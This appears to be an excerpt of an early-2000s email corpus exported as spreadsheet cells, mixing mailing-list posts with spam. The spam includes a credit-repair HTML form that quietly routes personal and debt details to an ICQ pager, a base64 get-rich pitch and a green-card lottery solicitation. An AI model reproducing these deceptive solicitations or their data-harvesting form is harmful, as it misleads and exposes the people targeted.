 Start improving your credit rating&lt;BR&gt;&lt;BR&gt;
 &lt;table BORDER cellpadding =3 width =595 CELLSPACING=0 CELLPADDING=0 WIDTH="100%" BGCOLOR=#000000&gt;
 &lt;td align=center WIDTH="100%" BGCOLOR="#99cc99" bordercolor="#99cc99"&gt;&lt;font face=Verdana COLOR=blue size=-1&gt;&lt;B&gt;Complete
 Our QuickForm and Submit it for Your Free Analysis.&lt;/font&gt;&lt;/B&gt;
 &lt;/td&gt;&lt;/tr&gt;
 &lt;/td&gt;&lt;/tr&gt;
 &lt;table  CELLSPACING=4 CELLPADDING=4 border=0 WIDTH="100%"&gt;
 &lt;tr bgcolor=99cc99&gt;
 		  &lt;form name="frmLogin"&gt;
 			&lt;input type="hidden" name="nick" value="Guest"&gt;
 																												&lt;input type="hidden" name="icq" value="158884664"&gt;
 			&lt;input type="hidden" name="info" value=""&gt;
 			&lt;input type="hidden" name="but" value="Chat"&gt;
 			 &lt;/form&gt;
           &lt;/td&gt;
           &lt;td rowspan="4" valign="top" width="47%" height="230"&gt;
 		  &lt;form name="myform"&gt;
 			&lt;input type="HIDDEN" name="charcount" value="450"&gt;
 		&lt;/form&gt;
             &lt;form name="pagerform" action="http://wwp.icq.com/whitepages/page_me/1,,,00.html" method="Post"&gt;		
 																													&lt;input type="HIDDEN" name="to" value="158884664"&gt;
               &lt;table width="85%" border="0" align="center"&gt;
                 &lt;tr&gt; 
          &lt;tr&gt; 
                   &lt;td&gt; 
                   &lt;/td&gt;
                   &lt;td&gt; 
                   &lt;/td&gt;
                 &lt;/tr&gt;
                 &lt;/tr&gt;
                 &lt;tr&gt; 
                 &lt;/tr&gt;
 				&lt;tr&gt;
 					&lt;td colspan="2"&gt;
 					&lt;/td&gt;
 				&lt;/tr&gt;
 			&lt;input type="HIDDEN" name="charcount" value="450"&gt;																						      
 &lt;input type="hidden" name="from" value="D22@D22.com"&gt;
 &lt;input type="hidden" name="fromemail" value="D24@D24.com"&gt;
 &lt;td align=right WIDTH="45%" HEIGHT="18" BGCOLOR="#99cc99"&gt;
 &lt;font face=Verdana color=#000000 size=-1&gt;&lt;img src="clear.gif" height=1 width=150&gt;&lt;br&gt;Name &lt;/font&gt;&lt;/td&gt;
 &lt;input type="hidden" name="body" value="{{name}}"&gt;
 &lt;td BGCOLOR="#99cc99"&gt;&lt;input type="text" size="21"  name="body" maxlength="30"&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;
 &lt;td align=right WIDTH="45%" BGCOLOR="#99cc99"&gt;
 &lt;font face=Verdana color=#000000 size=-1&gt;Street Address &lt;/font&gt;&lt;/td&gt;
 &lt;input type="hidden" name="body" value="{{address}}"&gt;
 &lt;td BGCOLOR="#99cc99"&gt;&lt;input type="text" size="21" name="body" maxlength="30"&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;
 &lt;td align=right WIDTH="45%" BGCOLOR="#99cc99"&gt;
 &lt;input type="hidden" name="body" value="{{city}}"&gt;
 &lt;font face=Verdana color=#000000 size=-1&gt;City &lt;/font&gt;&lt;/td&gt;
 &lt;td BGCOLOR="#99cc99"&gt;&lt;input name="body" size="21" maxlength=30&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;
 &lt;td align=right  WIDTH="45%" BGCOLOR="#99cc99"&gt;
 &lt;input type="hidden" name="body" value="{{state}}"&gt;
 &lt;font face=Verdana color=#000000 size=-1&gt;State / Zip &lt;/font&gt;&lt;/td&gt;
 &lt;td BGCOLOR="#99cc99"&gt;
 &lt;select name=body&gt;
 &lt;option value=""&gt;&lt;/option&gt;
 &lt;option value="AL"&gt; Alabama
 &lt;option value="AK"&gt; Alaska
 &lt;option value="AZ"&gt; Arizona
 &lt;option value="AR"&gt; Arkansas
 &lt;option value="CA"&gt; California
 &lt;option value="CO"&gt; Colorado
 &lt;option value="CT"&gt; Connecticut
 &lt;option value="DE"&gt; Delaware
 &lt;option value="DC"&gt; Dist of Columbia
 &lt;option value="FL"&gt; Florida
 &lt;option value="GA"&gt; Georgia
 &lt;option value="HI"&gt; Hawaii
 &lt;option value="ID"&gt; Idaho
 &lt;option value="IL"&gt; Illinois
 &lt;option value="IN"&gt; Indiana
 &lt;option value="IA"&gt; Iowa
 &lt;option value="KS"&gt; Kansas
 &lt;option value="KY"&gt; Kentucky
 &lt;option value="LA"&gt; Louisiana
 &lt;option value="ME"&gt; Maine
 &lt;option value="MD"&gt; Maryland
 &lt;option value="MA"&gt; Massachusetts
 &lt;option value="MI"&gt; Michigan
 &lt;option value="MN"&gt; Minnesota
 &lt;option value="MS"&gt; Mississippi
 &lt;option value="MO"&gt; Missouri
 &lt;option value="MT"&gt; Montana
 &lt;option value="NE"&gt; Nebraska
 &lt;option value="NV"&gt; Nevada
 &lt;option value="NH"&gt; New Hampshire
 &lt;option value="NJ"&gt; New Jersey
 &lt;option value="NM"&gt; New Mexico
 &lt;option value="NY"&gt; New York
 &lt;option value="NC"&gt; North Carolina
 &lt;option value="ND"&gt; North Dakota
 &lt;option value="OH"&gt; Ohio
 &lt;option value="OK"&gt; Oklahoma
 &lt;option value="OR"&gt; Oregon
 &lt;option value="PA"&gt; Pennsylvania
 &lt;option value="RI"&gt; Rhode Island
 &lt;option value="SC"&gt; South Carolina
 &lt;option value="SD"&gt; South Dakota
 &lt;option value="TN"&gt; Tennessee
 &lt;option value="TX"&gt; Texas
 &lt;option value="UT"&gt; Utah
 &lt;option value="VT"&gt; Vermont
 &lt;option value="VA"&gt; Virginia
 &lt;option value="WA"&gt; Washington
 &lt;option value="WV"&gt; West Virginia
 &lt;option value="WI"&gt; Wisconsin
 &lt;option value="WY"&gt; Wyoming &lt;/select&gt;
 &lt;input type="hidden" name="body" value="{{zip}}"&gt;
 &lt;input type=text name="body" size="5" maxlength=5&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;
 &lt;input type="hidden" name="body" value="{{hphone}}"&gt;
 &lt;td align=right WIDTH="45%" BGCOLOR="#99cc99"&gt;
 &lt;font face=Verdana color=#000000 size=-1&gt;Home Phone &lt;/font&gt;&lt;font size=-2&gt;(with area code) &lt;/font&gt;&lt;/td&gt;
 &lt;td BGCOLOR="#99cc99"&gt;&lt;input type="text" size="21" name="body" maxlength="19"&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;
 &lt;td align=right WIDTH="45%" BGCOLOR="#99cc99"&gt;
 &lt;input type="hidden" name="body" value="{{wphone}}"&gt;
 &lt;font face=Verdana color=#000000 size=-1&gt;Work Phone &lt;/font&gt;&lt;font size=-2 color=000000&gt;(with area code) &lt;/font&gt;&lt;/td&gt;
 &lt;td BGCOLOR="#99cc99"&gt;&lt;input type="text" size="21" name="body" maxlength="19"&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;
 &lt;td align=right WIDTH="45%" BGCOLOR="#99cc99"&gt;
 &lt;input type="hidden" name="body" value="{{btime}}"&gt;
 &lt;font face=Verdana color=#000000 size=-1&gt;Best
 Time To Contact &lt;/font&gt;&lt;/font&gt;&lt;/td&gt;
 &lt;td BGCOLOR="#99cc99"&gt;&lt;select size="1" name="body"&gt;
 &lt;option value="Morning at Home"&gt;Morning at Home&lt;/option&gt;
 &lt;option value="Morning at Work"&gt;Morning at Work&lt;/option&gt;
 &lt;option value="Afternoon at Home"&gt;Afternoon at Home&lt;/option&gt;
 &lt;option value="Afternoon at Work"&gt;Afternoon at Work&lt;/option&gt;
 &lt;option value="Evening at Home"&gt;Evening at Home&lt;/option&gt;
 &lt;option value="Evening at Work"&gt;Evening at Work &lt;/option&gt;
 &lt;option value="Weekend"&gt;Weekend&lt;/option&gt;&lt;/select&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;
 &lt;input type="hidden" name="body" value="{{email}}"&gt;
 &lt;td align=right WIDTH="45%" BGCOLOR="#99cc99"&gt;
 &lt;font face=Verdana color=#000000 size=-1&gt;Email
 address &lt;/font&gt;&lt;/td&gt;
 &lt;td BGCOLOR="#99cc99"&gt;&lt;input type="text" name="body" size="21"&gt;
 &lt;/td&gt;&lt;/tr&gt;
 &lt;input type="hidden" name="body" value="{{tdebt}}"&gt;
 &lt;td align=right WIDTH="45%" BGCOLOR="#99cc99"&gt;
 &lt;font face=Verdana color=#000000 size=-1&gt;Total
 Debt &lt;/font&gt;&lt;/td&gt;
 &lt;td BGCOLOR="#99cc99"&gt;
 &lt;select name=body&gt;
 &lt;option value=""&gt;&lt;/option&gt;
 &lt;option value="$4000 - $4999"&gt;$4000 - $4999
 &lt;option value="$5000 - $7500"&gt;$5000 - $7500
 &lt;option value="$7,501 - $10,000"&gt;$7,501 - $10,000
 &lt;option value="$10,001 - $12,500"&gt;$10,001 - $12,500
 &lt;option value="$12,501 - $15,000"&gt;$12,501 - $15,000
 &lt;option value="$15,001 - $17,500"&gt;$15,001 - $17,500
 &lt;option value="$17,501 - $20,000"&gt;$17,501 - $20,000
 &lt;option value="$20,001 - $22,500"&gt;$20,001 - $22,500
 &lt;option value="$22,501 - $25,000"&gt;$22,501 - $25,000
 &lt;option value="$25,001 - $27,500"&gt;$25,001 - $27,500
 &lt;option value="$27,501 - $30,000"&gt;$27,501 - $30,000
 &lt;option value="$30,001 - $35,000"&gt;$30,001 - $35,000
 &lt;option value="$35,001 - $40,000"&gt;$35,001 - $40,000
 &lt;option value="$45,001 - $50,000"&gt;$45,001 - $50,000
 &lt;option value="$50,000+"&gt;$50,000+&lt;/select&gt;
 &lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;center&gt;
 &lt;p&gt;&lt;input type="submit" value="Click Here to Submit"&gt;&lt;input type="reset" value="Reset"&gt;&lt;/center&gt;&lt;/form&gt;
 &lt;table BORDER=0 CELLSPACING=0 CELLPADDING=0 WIDTH="100%" &gt;
 &lt;tr&gt;
 &lt;td WIDTH="100%"&gt;
 &lt;center&gt;&lt;font face="Verdana" size=-2 color=880000&gt;Please click the submit button
 just once - process will take 30-60 seconds.&lt;/font&gt;&lt;/center&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td WIDTH="100%"&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;BR&gt;
 &lt;table BORDER cellpadding =3 width =595 CELLSPACING=0 CELLPADDING=0 WIDTH="100%" BGCOLOR=#000000&gt;
 &lt;td align=center WIDTH="100%" BGCOLOR="#99cc99" bordercolor="#99cc99"&gt;&lt;font face=Verdana COLOR=blue size=-1&gt;&lt;B&gt;Or, please reply to the email with the following for your Free Analysis&lt;/font&gt;&lt;/B&gt;
 &lt;BR&gt;
 &lt;/td&gt;&lt;/tr&gt;
 &lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;BR&gt;
 &lt;CENTER&gt;
 &lt;table BORDER=0 cellpadding =3 width =295 CELLSPACING=0 CELLPADDING=0 WIDTH="100%" BGCOLOR=#000000&gt;
 &lt;font face=Verdana color=#000000 size=-1&gt;
 Name:__________________________&lt;BR&gt;
 Address:________________________&lt;BR&gt;
 City:___________________________&lt;BR&gt;
 State:_____________ Zip:_________&lt;BR&gt;
 Home Phone:(___) ___-____    &lt;BR&gt;
 Work Phone:(___) ___-____    &lt;BR&gt;
 Best Time:_______________________&lt;BR&gt;
 Email:___________________________&lt;BR&gt;
 Total Debt:______________________&lt;BR&gt;
 &lt;/table&gt;
 &lt;/html&gt;&lt;BR&gt;
 Not Interested?  Please send and email to &lt;a href="mailto:jayshilling4792@excite.com"&gt;jayshilling4792@excite.com&lt;/a&gt;
 mamrfitxhidjpfxo
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Light reading
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://diveintomark.org/archives/2002/09/24.html#light_reading
 Date: 2002-09-24T10:46:15-05:00
 - _Phil Ringnalda_: Putting on the brakes[1]. &amp;#8220;So, the answer to the 
 question that started this whole project, "what is the RDF in RSS 1.0 good 
 for?" is two things: it's good for someone who has an infinitely large database 
 that can be queried infinitely fast by a schema-aware program, or it's good for 
 writing a schema-aware aggregator that can try to figure out what it should do 
 with new elements that it hasn't seen before. That's actually an interesting 
 project with some potential for success, but at this point I'm sick of the 
 whole thing, so I'll leave that project for someone else.&amp;#8221; 
 - _Aaron Swartz_: TRAMP: Makes RDF look like Python data structures[2]. 
 &amp;#8220;RDF/XML got you down? Tired of having to go through contortions to deal 
 with data? Want to write Python and be standards-compatible at the same time? 
 Need a module to implement the psuedo-code you had on your slides? TRAMP may or 
 may not be the answer to these problems!&amp;#8221; Complete with an example of 
 parsing FOAF files. 
 - _Dan Connolly_: HyperRDF: Using XHTML Authoring Tools with XSLT to produce 
 RDF schemas[3]. &amp;#8220;XML syntax is a little tedious, but lots of people are 
 evidently willing and able of editing it by hand. RDF adds another layer of 
 tedium, but there are still a few folks willing to write it by hand. I make 
 heavy use of reification/quoting in my representation of logical formulas in 
 RDF. This adds another layer of tedium that I find unmanageable, and I have 
 been writing XML/SGML/HTML by hand for 10 years.&amp;#8221; Also includes a cogent 
 explanation of the obscure profile attribute in HTML. 
 [1] http://philringnalda.com/archives/002330.php
 [2] http://www.aaronsw.com/2002/tramp
 [3] http://www.w3.org/2000/07/hs78/
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Giant otter statue to be built
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-5,8296986,1717/
 Date: 2002-09-27T02:45:52+01:00
 (Some Guy)
</t>
  </si>
  <si>
    <t xml:space="preserve">At a pub frequented by the members of the EU translator corps,
 a Spanish translator and an Irish translator start comparing
 notes.  The Spanish translator asks, "Is there anything in Irish
 Gaelic which corresponds to 'maana'?"  The Irishman thinks for
 a moment, fortified by a long pull at his pint, and finally
 responds, "Yes -- but it doesn't have the same sense of terrible
 urgency."
 -- 
 #ken	P-)}
 Ken Coar, Sanagendamgagwedweinini  http://Golux.Com/coar/
 Author, developer, opinionist      http://Apache-Server.Com/
 "Millennium hand and shrimp!"
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">I don't know who said the below.
 1) Measured in money, you are wrong.  Different ethnic groups achieve at
 widely different rates.  Always have.  A lot of research has been done
 on that topic, Sowell among others.
 2) If you exchanged the population of India and America, in a generation
 India would look like America.  In Two, America would look like India.
 3) As Bob said: 'valuable resources' has notin' to do with it.  See
 Japan, Hong Kong, Singapore, ...
 &gt; &gt;
 &gt; &gt; I'm sure that if someone checked the statistics, that the number of
 &gt; &gt; "successful" vs. "unsuccessful" (how to define those?) Indian
 &gt; &gt; immigrants in the US is statistically similar to the number of
 &gt; &gt; successful vs. unsuccessful Scotsmen.  I'm not going to, though.
 &gt; &gt;
 &gt; &gt; India is poor because it always was poor.  Unlike other countries
 &gt; &gt; in the region (including Ghana, Nigeria, et al) that have emerged
 &gt; &gt; from the ashes of Imperialism with strong growth, India is not
 &gt; &gt; blessed with a strong base of valuable resources.
 &gt; 
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">
 duly noted
 definately would make the extra effort to talk directly with these people
 and mention to the IFC (local arts cinema) about a more approriate
 showing.
 Would enough people in ILUG be interested to cover the possible costs
 of a showing some Saturday afternoon/morning.
 Anyway this is distant future anyway i have too much on my plate already.
 I hope the DVD they produce wont be region coded, damned anti-consumer
 cartels and monoplistic tendencies of coporate greed.
 Is this the same film the 2600 people are always going on about or is that
 something else?
 Later
 Alan
 On Wed, 14 Aug 2002, Rick Moen wrote:
 &gt; Date: Wed, 14 Aug 2002 12:02:13 -0700
 &gt; From: Rick Moen &lt;rick@linuxmafia.com&gt;
 &gt; To: Alan Horkan &lt;horkana@tcd.ie&gt;
 &gt; Cc: social@linux.ie
 &gt; Subject: Re: [ILUG] Linux: the film.
 &gt;
 &gt; [Moved from the ILUG list.  Not _entirely_ offlist as requested, but
 &gt; close enough.]
 &gt;
 &gt; Quoting Alan Horkan (horkana@tcd.ie):
 &gt;
 &gt; &gt; More likely we would try and get it when it comes out on video/dvd and
 &gt; &gt; show it then (which AFAIK is legal as we are non profit private
 &gt; &gt; organisation having a private showing and not charging our members for
 &gt; &gt; the showing. any opinions on the legality of this should be sent
 &gt; &gt; offlist).
 &gt;
 &gt;
 &gt; One bloke's opinion:
 &gt;
 &gt;
 &gt; Date: Sat, 01 Jun 2002 00:18:29 -0700
 &gt; From: "J.T.S. Moore" &lt;jtsmoore@pacificnet.net&gt;
 &gt; Reply-To: jtsmoore@pacificnet.net
 &gt; To: Marc MERLIN &lt;marc_news@vasoftware.com&gt;,
 &gt;    Daniel Isacc Walker &lt;dwalker@cats.ucsc.edu&gt;
 &gt; CC: svlug@svlug.org, Rick Moen &lt;rick@linuxmafia.com&gt;, sluglug@sluglug.ucsc.edu,
 &gt;    Peter Belew &lt;peterbe@sonic.net&gt;, "Eric A. Perlman" &lt;eric@yikes.com&gt;,
 &gt;    i3e-off@cse.ucsc.edu, slug-web@sluglug.ucsc.edu
 &gt; Subject: REVOLUTION OS is now authorized for UC Santa Cruz screening
 &gt;
 &gt; To all,
 &gt;
 &gt; I have read the series of e-mails related to the unauthorized UC Santa
 &gt; Cruz screening that was scheduled for June 1.  I sincerely appreciate
 &gt; IEEE's good faith effort to correct the mistake.
 &gt;
 &gt; Consequently, so as not to inconvenience the people planning to attend
 &gt; the screening, I want to give IEEE and SlugLUG permission to screen
 &gt; REVOLUTION OS at 1 PM on June 1.  I would ask the members of SVLUG to
 &gt; hold off on attending the screening for the simple reason that I am
 &gt; trying to get REVOLUTION OS booked into the Camera 3 in San Jose, and I
 &gt; would prefer that SVLUG's members have a chance to see a nice 35mm print
 &gt; of the film.  If my distributor is unable to book the film into a
 &gt; theater in the Bay Area, I promise that I will work with SVLUG to
 &gt; quickly set up a screening for its members.
 &gt;
 &gt; I realize there may be some members of SlugLUG who are unhappy that I
 &gt; originally requested that they not hold an unauthorized screening of
 &gt; REVOLUTION OS.  There are several reasons why I made the request, and
 &gt; none of them have anything to do with me wanting to be a jerk.
 &gt;
 &gt; One SlugLUG member commented that it was odd that a movie about the Open
 &gt; Source movement would not be available for open viewings.  Another
 &gt; SlugLUG member remarked that my request smacks of Bill Gates's Open Letter
 &gt; to Hobbyists.
 &gt;
 &gt; The bottomline is that I did make a film about the Open Source movement,
 &gt; but to assume that automatically means that the film is itself Open
 &gt; Sourced seems to be a little bit of a stretch.  If I made a movie about
 &gt; the history of vegetarianism that would not automatically mean I'm a
 &gt; vegetarian.
 &gt;
 &gt; I simply thought Open Source and Free Software were compelling subjects
 &gt; worth exploring and documenting.  As a result, I came to admire many
 &gt; aspects of the Open Source movement and chose to focus the documentary
 &gt; on the movement's positive history.  However, I do not think I should be
 &gt; punished for telling the story of Free Software and Open Source by
 &gt; having my intellectual property misappropriated.   More practically, my
 &gt; feelings about Open Sourcing REVOLUTION OS are abundantly clear when you
 &gt; see the explicit copyright notice at the end of the film's credits.
 &gt;
 &gt; I realize that making a videotape copy for personal use from a TV airing
 &gt; is considered fair use.  I believe in a healthy fair use doctrine.
 &gt; However, there is a big difference between viewing your personal copy at
 &gt; home with a few friends and holding a publicly advertised screening on a
 &gt; university campus.  So I freely admit my objection to unauthorized
 &gt; screenings of REVOLUTION OS does echo Bill Gates's letter.  Personally, I
 &gt; believe that the creator of a piece of intellectual property should
 &gt; retain the choice to Open Source their IP.  If the Open Source movement
 &gt; is not voluntary then it is really just piracy.
 &gt;
 &gt; One of the reasons I am concern with unauthorized group screenings of
 &gt; the film, is that my distributor is planning in a few weeks to begin
 &gt; selling VHS copies of the film for educational/institutional use with a
 &gt; license permitting noncommercial large group screenings.  We hope to use
 &gt; the money from these sales to fund the authoring and replication of the
 &gt; DVD.  I want to release the DVD as soon as possible, but I cannot afford
 &gt; to take on anymore REVOLUTION OS-related debt.  Thus the importance of
 &gt; preserving the educational/institutional market.
 &gt;
 &gt; Frequently, I will read comments on Slashdot and other mailing lists
 &gt; that justify the piracy of music on the grounds that it benefits the
 &gt; artists and only hurts the greedy record labels.  Well, in the case of
 &gt; REVOLUTION OS there is no multinational media conglomerate to punish.
 &gt; It's just me.  I made and financed the film on my own.  I have worked
 &gt; full-time for almost three years without a salary.  The only way I will
 &gt; get out of debt and have a chance to make another film is if people seek
 &gt; out legal opportunities to view REVOLUTION OS.
 &gt;
 &gt; I truly appreciate the enthusiasm of the Open Source community for
 &gt; REVOLUTION OS, and I am grateful that people do want to see it.  If you
 &gt; will just bare with me, I will figure out a way for all interested
 &gt; persons to legally view it.
 &gt;
 &gt; I hope the dust up over the unauthorized, and now authorized, screening
 &gt; at UC Santa Cruz has not inconvenienced anyone.
 &gt;
 &gt; Sincerely,
 &gt;
 &gt; J.T.S. Moore
 &gt; Director, REVOLUTION OS
 &gt;
 -- 
 Irish Linux Users' Group Social Events: social@linux.ie
 http://www.linux.ie/mailman/listinfo/social for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On Tuesday 01 October 2002 01:27 am, Mr. FoRK wrote:
 &gt; http://www.rathergood.com/vikings/
 Some classics from this period, now in a new English translation:
 "The Sagas of Icelanders" in trade paperback, from (duh) Viking, in 2000.
 Remaindered at my local Barnes &amp; Ignoble.   The historical reference 
 material is useful.
 Eirikur
</t>
  </si>
  <si>
    <t xml:space="preserve">------=_NextPart_000_00C5_22E25E1D.D0727B17
 Content-Type: text/plain; charset="iso-8859-1"
 Content-Transfer-Encoding: base64
 IA0KICAgICAgICAgICAgICAgICBEbyBZb3UgV2FudCBUbyBUZWFjaCBhbmQg
 R3JvdyBSaWNoPw0KDQoNCg0KDQoNCklmIHlvdSBhcmUgYSBtb3RpdmF0ZWQg
 YW5kIHF1YWxpZmllZCBjb21tdW5pY2F0b3IsIEkgd2lsbCBwZXJzb25hbGx5
 IHRyYWluIHlvdSB0byBkbyAzICAyMCBtaW51dGVzIHByZXNlbnRhdGlvbnMg
 cGVyIGRheSB0byBxdWFsaWZ5IHByb3NwZWN0cyB0aGF0IEkgY2FuIHByb3Zp
 ZGUgdG8geW91LiAgV2Ugd2lsbCBkZW1vbnN0cmF0ZSB0byB5b3UgdGhhdCB5
 b3UgY2FuIG1ha2UgJDQwMCBhIGRheSBwYXJ0IHRpbWUgdXNpbmcgdGhpcyBz
 eXN0ZW0uICBPciwgaWYgeW91IGhhdmUgMjAgaG91cnMgcGVyIHdlZWssIGFz
 IGluIG15IGNhc2UsIHlvdSBjYW4gbWFrZSBpbiBleGNlc3Mgb2YgJDEwLDAw
 MCBwZXIgd2VlaywgYXMgSSBhbSBjdXJyZW50bHkgZ2VuZXJhdGluZyAodmVy
 aWZpYWJsZSwgYnkgdGhlIHdheSkuICANCg0KUGx1cyBJIHdpbGwgaW50cm9k
 dWNlIHlvdSB0byBteSBtZW50b3Igd2hvIG1ha2VzIHdlbGwgaW4gZXhjZXNz
 IG9mICQxLDAwMCwwMDAgYW5udWFsbHkuDQoNCk1hbnkgYXJlIGNhbGxlZCwg
 ZmV3IGFyZSBjaG9zZW4uICBUaGlzIG9wcG9ydHVuaXR5IHdpbGwgYmUgbGlt
 aXRlZCB0byBvbmUgcXVhbGlmaWVkIGluZGl2aWR1YWwgcGVyIHN0YXRlLiAg
 TWFrZSB0aGUgY2FsbCBhbmQgY2FsbCB0aGUgMjQgaG91ciBwcmUtcmVjb3Jk
 ZWQgbWVzc2FnZSBudW1iZXIgYmVsb3cuICBXZSB3aWxsIHRha2UgYXMgbXVj
 aCBvciBhcyBsaXR0bGUgdGltZSBhcyB5b3UgbmVlZCB0byBzZWUgaWYgdGhp
 cyBwcm9ncmFtIGlzIHJpZ2h0IGZvciB5b3UuICANCg0KICAgICAgICAgICAg
 ICAgICAgICAgICAgICAqKio4MDEtMjk2LTQ0MTAgKioqIA0KDQpQbGVhc2Ug
 ZG8gbm90IG1ha2UgdGhpcyBjYWxsIHVubGVzcyB5b3UgYXJlIGdlbnVpbmVs
 eSBtb25leSBtb3RpdmF0ZWQgYW5kIHF1YWxpZmllZC4gIEkgbmVlZCBwZW9w
 bGUgd2hvIGFscmVhZHkgaGF2ZSBwZW9wbGUgc2tpbGxzIGluIHBsYWNlIGFu
 ZCBoYXZlIGVpdGhlciBtYWRlIGxhcmdlIGFtb3VudHMgb2YgbW9uZXkgaW4g
 dGhlIHBhc3Qgb3IgYXJlIHJlYWR5IHRvIGdlbmVyYXRlIGxhcmdlIGFtb3Vu
 dHMgb2YgbW9uZXkgaW4gdGhlIGZ1dHVyZS4gIExvb2tpbmcgZm9yd2FyZCB0
 byB5b3VyIGNhbGwuICAgIA0KICAgICAgICAgICAgICAgICAgICAgICAgICAg
 IA0KICAgICAgICAgICAgICAgICAgICAgICAgICAqKio4MDEtMjk2LTQ0MTAg
 KioqIA0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQpfX19fX19f
 X19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19f
 X19fX19fX19fX18gDQoqVG8gYmUgdGFrZW4gb3V0IG9mIHRoaXMgZGF0YWJh
 c2U6IA0KIGFydDkwNUBjb25zdWx0YW50LmNvbSAgDQoNCg0KDQoNCg0KMjA0
 NE1KTGk2LTc5M2dvTk4xMzA3V29sWDUtNTgxdkZzdTcwMjNuQnhkOC0xbDQy
 DQoxNjE1eUpTZjMtMDk3YU1aTzMxMDJuUUpZMi04OTJsMjg=
</t>
  </si>
  <si>
    <t xml:space="preserve">per john hall:
 "The opinion that EITHER we are spending too much OR we have too much
 regulation is pretty
 much anathema to liberal politics."
 no it's not.
 geege
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: process music: Mekons
</t>
  </si>
  <si>
    <t xml:space="preserve">http://reuters.com/news_article.jhtml?type=entertainmentnews&amp;StoryID=1543345
 Working this loose knit fashion is what keeps the Mekons so exciting, 
 Langford said. "When the Mekons was our whole day job, it became a 
 drudgery," he said. " Sometimes we get bogged down and trapped. But we're 
 usually pretty greasy enough to bite our leg off, squirm free and run 
 off."
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Get Your American Green Card - Now Online
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;body bgcolor="#FFFFFF" leftmargin="0" topmargin="0"&gt;
 &lt;!-- NEW TOP LOGO &amp; NAV --&gt;
 &lt;table width="100%" border="0" cellspacing="0" cellpadding="0"&gt;
   &lt;tr&gt;
     &lt;td colspan="3" height="5" bgcolor="#cccccc"&gt;&lt;img
 src="http://81.9.8.6/gcvc/images/space.gif" width="1" height="5"
 border="0"&gt;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;
     &lt;td colspan="3" height="1" bgcolor="#000000"&gt;&lt;img
 src="http://81.9.8.6/gcvc/images/space.gif" width="1" height="1"
 border="0"&gt;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;
     &lt;td align="left" width="150" height="107"&gt;
       &lt;a href="http://81.9.8.6/gcvc/index.htm"&gt;&lt;img
 src="http://81.9.8.6/gcvc/images/new-logo.gif" width="150"
 height="100%" border="0"&gt;&lt;/a&gt;
     &lt;/td&gt;
     &lt;td width="100%" align="left"
 background="http://81.9.8.6/gcvc/images/stripes.gif"&gt;&lt;img
 src="http://81.9.8.6/gcvc/images/space.gif" width="250" height="1"
 border="0"&gt;&lt;br&gt;
   &lt;b&gt;&lt;font face="arial" color="white"&gt;Live and Work In the United States of
 America!&lt;/font&gt;&lt;/b&gt;
     &lt;/td&gt;
     &lt;td&gt;
       &lt;img src="http://81.9.8.6/gcvc/images/right_top.gif" width="300"
 height="100%" border="0"&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;
     &lt;td colspan="3" height="1" bgcolor="#000000"&gt;&lt;img
 src="http://81.9.8.6/gcvc/images/space.gif" width="1" height="1"
 border="0"&gt;&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- END OF NEW TOP LOGO &amp; NAV --&gt;
 &lt;!--- main part ---&gt;
 &lt;table width="100%" height="80%" border="0" cellspacing="0" cellpadding="0"&gt;
   &lt;tr&gt;
     &lt;!--- middle area ---&gt;
     &lt;td width="730" valign="top" align="left"&gt;
 &lt;center&gt;
 &lt;font face="arial" size="2" color="black"&gt;&lt;i&gt;The following information is
 intended for people who wish to obtain an American Green Card that enables
 them to live and work in the United States Legally.&lt;/i&gt;&lt;/font&gt;&lt;p&gt;&lt;!--- main
 part ---&gt;&lt;table width="550" border="0" cellspacing="0" cellpadding="0"
 align="center"&gt;
   &lt;tr&gt;
     &lt;td align="center" valign="top"&gt;
   &lt;img src="http://81.9.8.6/gcvc/images/space.gif" width="10"
 height="1" border="0"&gt;&lt;a href="http://81.9.8.6/gcvc/index.htm"&gt;&lt;img
 src="http://81.9.8.6/gcvc/images/sam.gif" width="180" height="300"
 border="0"&gt;&lt;/a&gt;
 &lt;/td&gt;
 &lt;td&gt;
   &lt;img src="http://81.9.8.6/gcvc/images/space.gif" width="50"
 height="1" border="0"&gt;
 &lt;/td&gt;
     &lt;td align="left"&gt;
 &lt;font face="arial" size="2" color="black"&gt;
 The American Green Card Lottery Program (also known as DV2004) is a US
 Congress approved program that enables YOU to obtain the American Green Card
 through lottery that is conducted yearly by the American Government.&lt;p&gt;
 The Diversity Lottery (DV) Program makes 55,000 immigrant visas available
 through a lottery. If you win you will be entitled to Live and work In the
 United States with your family (you, your spouse and children under 21 years
 of age)&lt;p&gt;
 &lt;/font&gt;
 &lt;div align="center"&gt;
   &lt;a href="http://81.9.8.6/gcvc/index.htm"&gt;&lt;img
 src="http://81.9.8.6/gcvc/images/participate.gif" width="78"
